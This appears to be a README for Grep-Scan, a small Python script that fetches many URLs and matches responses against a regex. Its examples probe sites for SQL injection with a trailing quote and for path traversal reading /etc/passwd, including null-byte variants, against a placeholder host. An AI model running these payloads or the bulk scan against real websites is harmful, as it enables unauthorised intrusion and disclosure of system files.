Grep-Scan is a simple python script to match results in web requests
- Python 2.7
- Requests
pip install requests
git clone https://github.com/proclnas/grep-scan.git
cd grep-scan
python grep-scan.py --help
You can pass a single string or regexp to the -p/--pattern param to get pages with the correspondent pattern.
The main pivot of the grep scan is the re.search, so you can mount your expression based on it. See the full documentation to more details:
python -f uris.txt -p "bar" -t 20 -o pages-with-bar-word.txt
$ head uris.txt
http://site-fake.com/page.php?id=10'
http://site-fake.com/article.php?id=30'
http://site-fake.com/about.php?id=764'
Scan:
python -f uris.txt -p "/Mysql_|SQL|mysql_num_rows()|mysql_fetch_assoc()/" -t 50 -o sqli.txt
Output:
[+][Pattern found] http://site-fake.com/article.php?id=30'
$ head uris.txt
http://site-fake.com/download.php?file=../../../../../../../../etc/passwd
http://site-fake.com/file.php?download=../../../../../../../../etc/passwd%00
http://site-fake.com/pdf.php?get=../../../../../../../../etc/passwd%00
Scan:
python -f uris.txt -p "root:" -t 50 -o file-disclousure.txt
Output:
[+][Pattern found] http://site-fake.com/file.php?download=../../../../../../../../etc/passwd%00
Feel free to fork and send a pr.